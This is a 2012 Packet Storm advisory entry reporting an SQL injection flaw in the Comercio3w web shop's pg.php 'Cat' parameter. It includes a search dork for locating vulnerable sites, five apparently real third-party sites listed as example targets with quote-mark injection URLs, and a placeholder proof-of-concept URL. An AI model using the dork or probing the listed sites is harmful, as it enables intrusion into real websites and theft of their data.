Comercio3w SQL Injection

2012-06-16T00:00:00
ID PACKETSTORM:113794
Type packetstorm
Reporter xDarkSton3x
Modified 2012-06-16T00:00:00

Description

                                        
                                            `##################################################  
# Exploit Title: Comercio3w [ Sqli ]  
# Vendor: http://www.comercio3w.com/  
# Date: 16/06/2012  
# Author: xDarkSton3x  
#Website: http://www.insecurityperu.org - http://xdarkstonex.blogspot.com  
#Dork: inurl:pg.php?Cat=  
# E-mail : xdarkston3x@msn.com  
# Category: webapps  
# Example Sites :   
http://www.creatureloj.com/pg.php?Cat=%27  
http://www.ips.cifes.com/pg.php?Cat=%27  
http://www.adro.com.co/pg.php?Cat=%27  
http://tellmetheway.net/pg.php?Cat=%27  
http://fondodeinversiones.net/pg.php?Cat=%27  
  
##################################################  
  
[~]Exploit/p0c :  
http://www.site.com/pg.php?Cat=[Sqli]  
  
Greetz: [ InsecurityPeru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]   
`